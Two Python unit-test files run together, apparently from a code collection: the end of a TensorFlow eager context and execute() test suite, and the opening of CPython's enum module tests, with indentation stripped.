np_d = np.array([[1, 2], [1, 2]])
np_e = np.array([1, 1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
self.assertNotEqual(tf_a, tf_d)
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [[True, True], [True, True]])
with self.assertRaises(ValueError):
bool(tf_a == tf_d)
self.assertAllEqual(tf_a == tf_d, [[True, False], [True, False]])
self.assertFalse(bool(tf_a == tf_e))
self.assertTrue(bool(tf_a != tf_e))
self.assertNotAllEqual(tf_a, tf_e)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [[True, True], [True, True]])
self.assertAllEqual(np_a == np_d, [[True, False], [True, False]])
self.assertFalse(bool(np_a == np_e))
self.assertTrue(bool(np_a != np_e))
self.assertNotAllEqual(np_a, np_e)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
@test_util.disable_tfrt('Get execution mode not supported in TFRT.')
def testContext(self):
ctx = context.Context()
self.assertTrue(ctx.executing_eagerly())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertEqual(context.SYNC, ctx.execution_mode)
ctx.execution_mode = context.ASYNC
self.assertEqual(context.ASYNC, ctx.execution_mode)
ctx.execution_mode = context.SYNC
self.assertEqual(context.SYNC, ctx.execution_mode)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(ctx.list_logical_devices('CPU')[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
gpus = ctx.list_logical_devices('GPU')
if gpus:
with ctx.device(gpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testDevice_supportsLogicalDevice(self):
ctx = context.Context()
cpus = ctx.list_logical_devices('CPU')
with ctx.device(cpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
def testDevice_supportsDeviceSpec(self):
ctx = context.Context()
device_name = '/job:localhost/replica:0/task:0/device:CPU:0'
device_spec = pydev.DeviceSpec.from_string(device_name)
with ctx.device(device_spec):
self.assertEqual(device_name, ctx.device_name)
def testAsyncBasic(self):
ctx = context.Context(execution_mode=context.ASYNC)
ctx.ensure_initialized()
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
@test_util.disable_tfrt('Multi CPU placement not supported yet.')
def testMultiCpuPlacement(self):
with ops.device('cpu:1'):
x = array_ops.identity(1.0)
with ops.device('cpu:0'):
y = array_ops.identity(x)
self.assertEqual(x.device, '/job:localhost/replica:0/task:0/device:CPU:1')
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
@test_util.run_gpu_only
def testShouldCopy(self):
with ops.device('GPU:0'):
x = array_ops.identity(1.0)
self.assertEndsWith(x.device, 'GPU:0')
y = array_ops.identity(x)
# The value we're testing y.device against will depend on what the behavior
# of not explicitly specifying a device in the context is. This behavior is
# subject to change (for example, in the future we may want to use GPUs, if
# available, when no device is explicitly provided)
self.assertEqual(y.device, current_device())
def testContextSwitchStackContainsEagerMode(self):
# Eager execution has been enabled, and no other context switch has
# occurred, so `context_switches` should contain exactly one entry.
self.assertEqual(len(context.context().context_switches.stack), 1)
switch = context.context().context_switches.stack[0]
# The entry should log that eager mode was entered.
self.assertIs(switch.enter_context_fn, context.eager_mode)
# It is not possible to build a graph function when eager execution
# is enabled; the stack entry should reflect this fact.
self.assertFalse(switch.is_building_function)
@test_util.run_gpu_only
def testInt32GPU(self):
with ops.device('gpu:0'):
xent = nn_ops.sparse_softmax_cross_entropy_with_logits(
logits=[[0.0, 0.0]], labels=[0])
self.assertAllClose(xent, [0.69314718])
def _runInThread(self, target, args):
# The try/except that only re-raised the exception was a no-op; exceptions
# propagate identically without it.
t = threading.Thread(target=target, args=args)
t.start()
t.join()
# Test that different thread local values are initialized to the same values
# in different threads.
def testContextThreadLocalMembers(self):
def get_context_values(ctx):
return [
ctx.executing_eagerly(),
ctx.scope_name,
ctx.device_name,
ctx.num_gpus()
]
def get_values(ctx, values):
values.extend(get_context_values(ctx))
context_values = []
ctx = context.Context()
self._runInThread(get_values, (ctx, context_values))
self.assertAllEqual(context_values, get_context_values(ctx))
@test_util.run_gpu_only
@test_util.disable_tfrt('Context config not supported in TFRT.')
def testContextConfig(self):
ctx = context.Context(config=config_pb2.ConfigProto(
device_count={'GPU': 0}))
self.assertEqual(0, ctx.num_gpus())
def testPickle(self):
tmp_dir = self.get_temp_dir()
fname = os.path.join(tmp_dir, 't.pickle')
with open(fname, 'wb') as f:
t = constant_op.constant(10.0)
pickle.dump(t, f)
with open(fname, 'rb') as f:
t = pickle.load(f)
self.assertAllEqual(t.numpy(), 10.0)
@test_util.run_gpu_only
def testDevicePlacementEnforcesConsistency(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
cpu.__enter__()
self.assertEndsWith(current_device(), 'CPU:0')
gpu.__enter__()
self.assertEndsWith(current_device(), 'GPU:0')
with self.assertRaisesRegex(
RuntimeError, 'Exiting device scope without proper scope nesting'):
cpu.__exit__()
self.assertEndsWith(current_device(), 'GPU:0')
gpu.__exit__()
self.assertEndsWith(current_device(), 'CPU:0')
cpu.__exit__()
@test_util.run_gpu_only
def testReEntrant(self):
cpu = context.device('cpu:0')
gpu = context.device('gpu:0')
with cpu:
with gpu:
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'GPU:0')
self.assertEndsWith(current_device(), 'CPU:0')
with gpu:
self.assertEndsWith(current_device(), 'GPU:0')
@test_util.run_gpu_only
def testTensorPlacement(self):
x = constant_op.constant(1.).gpu()
with context.device('gpu:0'):
y = constant_op.constant(2.)
# Add would fail if t2 were not on GPU
result = execute(
b'Add', 1, inputs=[x, y],
attrs=('T', x.dtype.as_datatype_enum))[0].cpu().numpy()
self.assertEqual(3, result)
@test_util.run_gpu_only
def testResourceTensorPlacement(self):
with context.device('gpu:0'):
v = resource_variable_ops.ResourceVariable(1.0)
with context.device('cpu:0'):
# Check that even though we specified the cpu device we'll run the read op
# in the device where the handle is.
self.assertAllEqual(
gen_resource_variable_ops.read_variable_op(v.handle, v.dtype), 1.0)
@test_util.run_gpu_only
def testCopyBetweenDevices(self):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
@test_util.run_gpu_only
def testCopyBetweenDevicesAsync(self):
with context.execution_mode(context.ASYNC):
x = constant_op.constant([[1., 2.], [3., 4.]])
x = x.cpu()
x = x.gpu()
x = x.gpu()
x = x.cpu()
context.context().executor.wait()
# Invalid device
with self.assertRaises(RuntimeError):
x.gpu(context.context().num_gpus() + 1)
context.context().executor.wait()
context.context().executor.clear_error()
@test_util.run_gpu_only
def testCopyScope(self):
constant = constant_op.constant(1.0)
with ops.device('gpu:0'):
with context.device_policy(context.DEVICE_PLACEMENT_SILENT):
c = constant + 1.0
self.assertAllEqual(c, 2.0)
@test_util.disable_tfrt('ContextFromInterface not implemented.')
def testPyFunctionNullContext(self):
def simple_fn(unused_handle):
return 1.
with ops.device('CPU:0'):
test_var = variables.Variable([2., 3.])
@def_function.function
def test_fn(v):
script_ops.eager_py_func(simple_fn, [v.handle], dtypes.float32)
return 1.
self.assertAllEqual(test_fn(test_var), 1.0)
@test_util.disable_tfrt('PyFunc is not supported in TFRT.')
def testPyFunctionAsync(self):
def simple_fn(v):
one = constant_op.constant(1.)
return v + one
@def_function.function
def test_fn(v):
return script_ops.eager_py_func(simple_fn, [v], dtypes.float32)
async_executor = executor.new_executor(enable_async=True)
with context.executor_scope(async_executor):
test_var = variables.Variable(2.)
self.assertAllEqual(test_fn(test_var), 3.0)
async_executor.wait()
with context.executor_scope(async_executor):
test_var = variables.Variable(2.)
result = test_fn(test_var)
context.async_wait()
self.assertAllEqual(result, 3.0)
@test_util.run_gpu_only
def testNumpyForceCPU(self):
cpu = constant_op.constant([[1., 2.], [3., 4.]])
c2g = cpu.gpu()
self.assertAllEqual(c2g, cpu.numpy())
def testCopyFromCPUToCPU(self):
ta = constant_op.constant([[1, 2], [3, 4]])
tb = ta.cpu()
self.assertNotEqual(id(ta), id(tb))
self.assertAllEqual(ta, tb.numpy())
def testRegisterExceptionClass(self):
with self.assertRaises(TypeError):
pywrap_tfe.TFE_Py_RegisterExceptionClass(str)
pywrap_tfe.TFE_Py_RegisterExceptionClass(core._NotOkStatusException) # pylint: disable=protected-access
# TODO(agarwal): add tests passing incorrect typed values to attrs.
def testExecuteBasic(self):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
def testExecuteBasicAsync(self):
with context.execution_mode(context.ASYNC):
three = constant_op.constant(3)
five = constant_op.constant(5)
product = execute(
b'Mul',
num_outputs=1,
inputs=[three, five],
attrs=('T', three.dtype.as_datatype_enum))[0]
self.assertAllEqual(15, product)
# Error: Invalid arguments
# TODO(b/149995282): When an exception is thrown in ASYNC mode, it seems
# there are things left over that cause mutex corruption when
# _reset_context() is called before the next test is executed.
#
# context.set_execution_mode(context.ASYNC)
# with self.assertRaises(errors.InvalidArgumentError):
# execute(
# b'MatMul',
# num_outputs=1,
# inputs=[three, five],
# attrs=('transpose_a', False, 'transpose_b', False, 'T',
# three.dtype.as_datatype_enum))
# context.context().executor.wait()
#
context.context().executor.clear_error()
context.context().execution_mode = context.SYNC
@test_util.disable_tfrt('TFRT asserts correct number of outputs instead of '
'returning error status.')
def testExecuteTooManyNumOutputs(self):
# num_outputs provided is 50, but only one output is produced.
product = execute(
b'Mul',
num_outputs=50,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual(15, product)
@test_util.disable_tfrt('TFRT asserts correct number of outputs instead of '
'returning error status.')
def testExecuteTooFewNumOutputs(self):
# num_outputs provided is 0, but one output is produced.
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'Mul',
num_outputs=0,
inputs=[constant_op.constant(3),
constant_op.constant(5)],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
@test_util.run_gpu_only
def testMatMulGPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
@test_util.run_gpu_only
def testMatMulGPUCopyToCPU(self):
three = constant_op.constant([[3.]]).gpu()
five = constant_op.constant([[5.]]).gpu()
with ops.device('CPU:0'):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[three, five],
attrs=('transpose_a', False, 'transpose_b', False, 'T',
three.dtype.as_datatype_enum))[0]
self.assertAllEqual([[15.0]], product)
def testExecuteStringAttr(self):
checked_three = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 'just checking', 'T',
dtypes.float32.as_datatype_enum))[0]
self.assertEqual([[3]], checked_three.numpy())
def testExecuteStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'CheckNumerics',
num_outputs=1,
inputs=[constant_op.constant(3.)],
attrs=('message', 1, 'T', dtypes.float32.as_datatype_enum))
def testExecuteFloatAttr(self):
almost_equal = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', 0.3, 'T', dtypes.float32.as_datatype_enum))[0]
self.assertTrue(almost_equal)
def testExecuteFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'ApproximateEqual',
num_outputs=1,
inputs=[constant_op.constant(3.0), constant_op.constant(2.9)],
attrs=('tolerance', '0.3', 'T', dtypes.float32.as_datatype_enum))
def testExecuteIntAttr(self):
total = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', 2))[0]
self.assertAllEqual(7, total)
def testExecuteIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
_ = execute(
b'AddN',
num_outputs=1,
inputs=[constant_op.constant(3), constant_op.constant(4)],
attrs=('T', dtypes.int32.as_datatype_enum, 'N', '2'))
# Looks like we don't have an existing op with list(bool) attrs.
def testExecuteBoolAttr(self):
product = execute(
b'MatMul',
num_outputs=1,
inputs=[constant_op.constant([[3.]]),
constant_op.constant([[5.]])],
attrs=('transpose_a', True, 'transpose_b', False, 'T',
dtypes.int32.as_datatype_enum))[0]
self.assertAllEqual([[15]], product)
def testExecuteShapeAttr(self):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [1, 2], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteShapeAttrBadValue(self):
with self.assertRaisesRegex(
errors.InvalidArgumentError,
'Expecting a Dimension for attr shape, got object'):
execute(
b'VarHandleOp',
num_outputs=1,
inputs=[],
attrs=('shape', [object()], 'dtype', dtypes.int32.as_datatype_enum,
'container', '', 'shared_name', ''))
def testExecuteListStringAttr(self):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description',
'tensor_summary', 'labels', ['3',
'summary'], 'display_name', 'test'))
def testExecuteListStringAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', 3, 'display_name', 'test'))
def testExecuteListStringAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'TensorSummary',
num_outputs=1,
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum, 'description', '',
'labels', [3], 'display_name', 'test'))
def testExecuteListFloatAttr(self):
b = execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', [4.0,
6.0]))[0]
self.assertAllEqual([0, 1, 2], b)
def testExecuteListFloatAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries', 4.0))
def testExecuteListFloatAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Bucketize',
num_outputs=1,
inputs=[constant_op.constant([3.0, 5.0, 7.0])],
attrs=('T', dtypes.float32.as_datatype_enum, 'boundaries',
['4.0', '6.0']))
def testExecuteListIntAttr(self):
b = execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', [0, 2]))[0]
self.assertAllEqual([3], b)
def testExecuteListIntAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims', 0))
def testExecuteListIntAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Squeeze',
num_outputs=1,
inputs=[constant_op.constant([[[3.0]]])],
attrs=('T', dtypes.float32.as_datatype_enum, 'squeeze_dims',
['0', '2']))
def testExecuteListTypeListShapeAttr(self):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', dtypes.float64.as_datatype_enum, 'shapes',
[[1, 2]], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListTypeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', '1', 'shapes', [[1, 2]], 'capacity', -1,
'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1, 2], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteListShapeAttrBadListValue(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Barrier',
num_outputs=1,
inputs=[],
attrs=('component_types', [dtypes.float64.as_datatype_enum], 'shapes',
[1], 'capacity', -1, 'container', '', 'shared_name', ''))
def testExecuteMultipleOutputs(self):
split_dim = 1
value = [[0, 1, 2], [3, 4, 5]]
x1, x2, x3 = execute(
b'Split',
num_outputs=3,
inputs=[constant_op.constant(split_dim),
constant_op.constant(value)],
attrs=('num_split', 3, 'T', dtypes.int32.as_datatype_enum))
self.assertAllEqual([[0], [3]], x1)
self.assertAllEqual([[1], [4]], x2)
self.assertAllEqual([[2], [5]], x3)
def testExecuteBadNumOutputsArgument(self):
with self.assertRaises(TypeError):
execute(
b'Relu', [],
inputs=[constant_op.constant(3.0)],
attrs=('T', dtypes.float32.as_datatype_enum))
@test_util.disable_tfrt('TFRT raises InternalError instead of NotFoundError')
def testExecuteUnknownOp(self):
with self.assertRaises(errors.NotFoundError):
execute(b'BlahBlahBlah', num_outputs=1, inputs=[], attrs=None)
def testExecuteUnknownAttr(self):
with self.assertRaises(errors.InvalidArgumentError):
execute(
b'Identity',
num_outputs=1,
inputs=[constant_op.constant(3)],
attrs=('T', dtypes.int32.as_datatype_enum, 'unknown_attr', 'blah'))
def testComposition(self):
def add(x, y):
return execute(
b'Add',
num_outputs=1,
inputs=[x, y],
attrs=('T', dtypes.int32.as_datatype_enum))[0]
x = constant_op.constant(1)
three_x = add(add(x, x), x)
self.assertEqual(dtypes.int32, three_x.dtype)
self.assertAllEqual(3, three_x)
@test_util.run_gpu_only
def testOperationWithNoInputsRunsOnDevice(self):
shape = constant_op.constant([], dtype=dtypes.int32)
# x: Run the "TruncatedNormal" op CPU and copy result to GPU.
x = truncated_normal(shape).gpu()
# y: Explicitly run the "TruncatedNormal" op on GPU.
with context.device('gpu:0'):
y = truncated_normal(shape)
# Add would fail if x and y were not on the same device.
execute(
b'Add', 1, inputs=[x, y], attrs=('T', x.dtype.as_datatype_enum))
def testInvalidDevice(self):
with self.assertRaises(ValueError):
with context.device('pu:0'):
_ = constant_op.constant(1)
def testConvertMixedEagerTensors(self):
array = np.zeros((), dtype=np.float32)
tensor = constant_op.constant(0., dtype=dtypes.float32)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
[array, tensor], context.context())
for typ, t in zip(types, tensors):
self.assertEqual(typ, dtypes.float32)
self.assertIsInstance(t, ops.EagerTensor)
def testConvertMixedEagerTensorsWithVariables(self):
var = resource_variable_ops.ResourceVariable(1.0)
types, tensors = execute_lib.convert_to_mixed_eager_tensors(
['foo', var], context.context())
self.assertAllEqual([dtypes.string, dtypes.float32], types)
for t in tensors:
self.assertIsInstance(t, ops.EagerTensor)
# TODO(b/123637108): re-enable
@test_util.run_gpu_only
def disabled_testSmallIntegerOpsForcedToCPU(self):
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.int64)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op forced to CPU since all constants are integers and small.
self.assertEndsWith(c.device, 'CPU:0')
a = array_ops.zeros((8, 10), dtype=dtypes.int64)
b = array_ops.ones((8, 10), dtype=dtypes.int64)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the tensors are larger than 64 elements.
self.assertEndsWith(c.device, 'GPU:0')
a = constant_op.constant((1, 2, 3, 4, 5), dtype=dtypes.float32)
b = constant_op.constant((2, 3, 4, 5, 6), dtype=dtypes.float32)
with context.device('gpu:0'):
c = a + b
# Op not forced to CPU since the constants are not integers.
self.assertEndsWith(c.device, 'GPU:0')
def testExecutionModeIsStoredThreadLocal(self):
cv = threading.Condition()
count = [0]
num_threads = 10
def execution_mode_test(cond, count, num_threads, ctx, mode):
cond.acquire()
# Ensure that all threads set their mode simultaneously
# Note that this is not a simple assignment, as the execution_mode is an
# @property with a custom setter.
ctx.execution_mode = mode
count[0] = count[0] + 1
if count[0] < num_threads:
cond.wait()
else:
cond.notify_all()
cond.release()
self.assertEqual(ctx.execution_mode, mode)
ctx = context.Context()
threads = []
for i in range(num_threads):
t = threading.Thread(
target=execution_mode_test,
args=(cv, count, num_threads, ctx,
context.SYNC if i % 2 == 0 else context.ASYNC))
t.start()
threads.append(t)
for t in threads:
t.join()
def testEmptyResourceReturned(self):
with ops.device('CPU:0'):
v = variables.Variable(1.)
empty_handle = array_ops.gather(
v.handle[array_ops.newaxis], array_ops.zeros([0], dtype=dtypes.int32))
self.assertEqual(
[0],
empty_handle.shape.as_list())
class SendRecvTest(test_util.TensorFlowTestCase):
cpu_device = '/job:localhost/replica:0/task:0/device:CPU:0'
def _send(self, tensor, tensor_name, to_device):
return execute(
b'_Send', num_outputs=0, inputs=[tensor],
attrs=('T', tensor.dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', tensor.device,
'send_device_incarnation', 0,
'recv_device', to_device,
'client_terminated', True))
def _recv(self, dtype, tensor_name, from_device):
device_name = context.context().device_name
if not device_name:
device_name = self.cpu_device
return execute(
b'_Recv', num_outputs=1, inputs=[],
attrs=('tensor_type', dtype.as_datatype_enum,
'tensor_name', tensor_name,
'send_device', from_device,
'send_device_incarnation', 0,
'recv_device', device_name,
'client_terminated', False))[0]
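  # _Send and _Recv pair up through a rendezvous key built from tensor_name
  # plus the sending and receiving device names, so both helpers must agree
  # on those values for a transfer to complete.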
def setUp(self):
super(SendRecvTest, self).setUp()
context._reset_context()
configure_virtual_cpus()
@test_util.disable_tfrt('Send/Receive not supported in TFRT yet.')
def testBasic(self):
t0 = constant_op.constant(1.0)
t1 = constant_op.constant(2.0)
self._send(t0, 't0', self.cpu_device)
self._send(t1, 't1', self.cpu_device)
self.assertAllEqual(
self._recv(dtypes.float32, 't0', self.cpu_device),
1.0)
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
@test_util.run_gpu_only
@test_util.disable_tfrt('Send/Receive not supported in TFRT yet.')
def testLocalCrossDevice(self):
gpu_device_name = '/job:localhost/replica:0/task:0/device:GPU:0'
with ops.device('GPU:0'):
t0 = array_ops.identity(1.0)
self._send(t0, 't0', self.cpu_device)
with ops.device('cpu:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't0', gpu_device_name),
1.0)
self._send(constant_op.constant(2.0), 't1', gpu_device_name)
with ops.device('GPU:0'):
self.assertAllEqual(
self._recv(dtypes.float32, 't1', self.cpu_device),
2.0)
class EagerTensorCacheTest(test_util.TensorFlowTestCase):
def setUp(self):
super(EagerTensorCacheTest, self).setUp()
context._reset_context()
configure_virtual_cpus()
def testCacheSkipsTensorsTooLarge(self):
cache = context._EagerTensorCache(max_items=100, max_tensor_size=3)
cache.put('1', array_ops.zeros((2, 2)))
self.assertIsNone(cache.get('1'))
cache.put('2', array_ops.zeros((2)))
self.assertIsNotNone(cache.get('2'))
if __name__ == '__main__':
test.main()
|
test_enum.py
|
import enum
import inspect
import pydoc
import sys
import unittest
import threading
from collections import OrderedDict
from enum import Enum, IntEnum, StrEnum, EnumMeta, Flag, IntFlag, unique, auto
from io import StringIO
from pickle import dumps, loads, PicklingError, HIGHEST_PROTOCOL
from test import support
from test.support import ALWAYS_EQ
from test.support import threading_helper
from datetime import timedelta
# for pickle tests
try:
class Stooges(Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
Stooges = exc
try:
class IntStooges(int, Enum):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
IntStooges = exc
try:
class FloatStooges(float, Enum):
LARRY = 1.39
CURLY = 2.72
MOE = 3.142596
except Exception as exc:
FloatStooges = exc
try:
class FlagStooges(Flag):
LARRY = 1
CURLY = 2
MOE = 3
except Exception as exc:
FlagStooges = exc
# for pickle test and subclass tests
class Name(StrEnum):
BDFL = 'Guido van Rossum'
FLUFL = 'Barry Warsaw'
try:
Question = Enum('Question', 'who what when where why', module=__name__)
except Exception as exc:
Question = exc
try:
Answer = Enum('Answer', 'him this then there because')
except Exception as exc:
Answer = exc
try:
Theory = Enum('Theory', 'rule law supposition', qualname='spanish_inquisition')
except Exception as exc:
Theory = exc
# for doctests
try:
class Fruit(Enum):
TOMATO = 1
BANANA = 2
CHERRY = 3
except Exception:
pass
def test_pickle_dump_load(assertion, source, target=None):
if target is None:
target = source
for protocol in range(HIGHEST_PROTOCOL + 1):
assertion(loads(dumps(source, protocol=protocol)), target)
def test_pickle_exception(assertion, exception, obj):
for protocol in range(HIGHEST_PROTOCOL + 1):
with assertion(exception):
dumps(obj, protocol=protocol)
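# Usage sketch: both helpers sweep every pickle protocol. For example,
#   test_pickle_dump_load(self.assertIs, Stooges.CURLY)
# asserts that each protocol round-trips the member to the identical object,
# while test_pickle_exception asserts that pickling raises as expected.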
class TestHelpers(unittest.TestCase):
# _is_descriptor, _is_sunder, _is_dunder
def test_is_descriptor(self):
class foo:
pass
for attr in ('__get__','__set__','__delete__'):
obj = foo()
self.assertFalse(enum._is_descriptor(obj))
setattr(obj, attr, 1)
self.assertTrue(enum._is_descriptor(obj))
def test_is_sunder(self):
for s in ('_a_', '_aa_'):
self.assertTrue(enum._is_sunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '__a__', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_sunder(s))
def test_is_dunder(self):
for s in ('__a__', '__aa__'):
self.assertTrue(enum._is_dunder(s))
for s in ('a', 'a_', '_a', '__a', 'a__', '_a_', '_a__', '__a_', '_',
'__', '___', '____', '_____',):
self.assertFalse(enum._is_dunder(s))
# for subclassing tests
class classproperty:
def __init__(self, fget=None, fset=None, fdel=None, doc=None):
self.fget = fget
self.fset = fset
self.fdel = fdel
if doc is None and fget is not None:
doc = fget.__doc__
self.__doc__ = doc
def __get__(self, instance, ownerclass):
return self.fget(ownerclass)
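# A minimal illustration of classproperty (the _ClasspropertyExample name is
# for demonstration only): the computed attribute is served on the class
# itself, which the builtin property cannot do.
class _ClasspropertyExample:
    @classproperty
    def qualname_length(cls):
        return len(cls.__name__)

assert _ClasspropertyExample.qualname_length == len('_ClasspropertyExample')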
# tests
class TestEnum(unittest.TestCase):
def setUp(self):
class Season(Enum):
SPRING = 1
SUMMER = 2
AUTUMN = 3
WINTER = 4
self.Season = Season
class Konstants(float, Enum):
E = 2.7182818
PI = 3.1415926
TAU = 2 * PI
self.Konstants = Konstants
class Grades(IntEnum):
A = 5
B = 4
C = 3
D = 2
F = 0
self.Grades = Grades
class Directional(str, Enum):
EAST = 'east'
WEST = 'west'
NORTH = 'north'
SOUTH = 'south'
self.Directional = Directional
from datetime import date
class Holiday(date, Enum):
NEW_YEAR = 2013, 1, 1
IDES_OF_MARCH = 2013, 3, 15
self.Holiday = Holiday
def test_dir_on_class(self):
Season = self.Season
self.assertEqual(
set(dir(Season)),
set(['__class__', '__doc__', '__members__', '__module__',
'SPRING', 'SUMMER', 'AUTUMN', 'WINTER']),
)
def test_dir_on_item(self):
Season = self.Season
self.assertEqual(
set(dir(Season.WINTER)),
set(['__class__', '__doc__', '__module__', 'name', 'value']),
)
def test_dir_with_added_behavior(self):
class Test(Enum):
this = 'that'
these = 'those'
def wowser(self):
return ("Wowser! I'm %s!" % self.name)
self.assertEqual(
set(dir(Test)),
set(['__class__', '__doc__', '__members__', '__module__', 'this', 'these']),
)
self.assertEqual(
set(dir(Test.this)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'wowser']),
)
def test_dir_on_sub_with_behavior_on_super(self):
# see issue22506
class SuperEnum(Enum):
def invisible(self):
return "did you see me?"
class SubEnum(SuperEnum):
sample = 5
self.assertEqual(
set(dir(SubEnum.sample)),
set(['__class__', '__doc__', '__module__', 'name', 'value', 'invisible']),
)
def test_dir_on_sub_with_behavior_including_instance_dict_on_super(self):
